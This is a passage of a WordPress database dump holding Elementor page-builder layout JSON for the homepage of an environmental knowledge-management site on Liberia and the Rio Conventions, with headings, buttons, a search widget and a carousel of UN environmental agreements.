Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16921,2533,'_elementor_version','2.7.5'),(16922,2533,'_elementor_template_type','wp-page'),(16923,2533,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16925,2534,'_wp_page_template','default'),(16926,2534,'_elementor_edit_mode','builder'),(16927,2534,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_